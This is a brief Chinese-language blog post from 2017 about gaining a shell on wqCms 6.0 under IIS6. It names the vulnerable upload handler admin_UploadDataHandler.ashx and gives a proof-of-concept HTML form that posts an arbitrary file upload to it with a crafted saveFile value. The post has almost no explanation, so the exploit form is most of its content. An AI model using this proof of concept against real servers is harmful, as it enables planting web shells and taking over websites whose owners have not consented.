wqCms6-0在IIS6的Getshell

关键词: wqCms, Getshell

2017-02-15发布

一、漏洞利用点


漏洞文件:admin_UploadDataHandler.ashx 自定义构造上传点

二、hack it


三、POC



<html>
    <body>
        <form action="http://127.0.0.1/admin_UploadDataHandler.ashx" method="POST"enctype="multipart/form-data">
            <input  type="file" name="uploadify" />
            <input  type="text" name="saveFile" value="admin" />
            <input type="submit" name="Upload" value="Submit Query" />
        </form>
    </body>
</html>

转自群友论坛文章wobushou

喜欢本文?求鼓励,求支持!

创作时间: 2017.02.22 21:20
最后修改: 2017.03.27 19:04

本文版权:Akkuman's   共享协议:署名-非商业使用-禁止演绎


随机推荐:



Title - Artist
0:00
TOP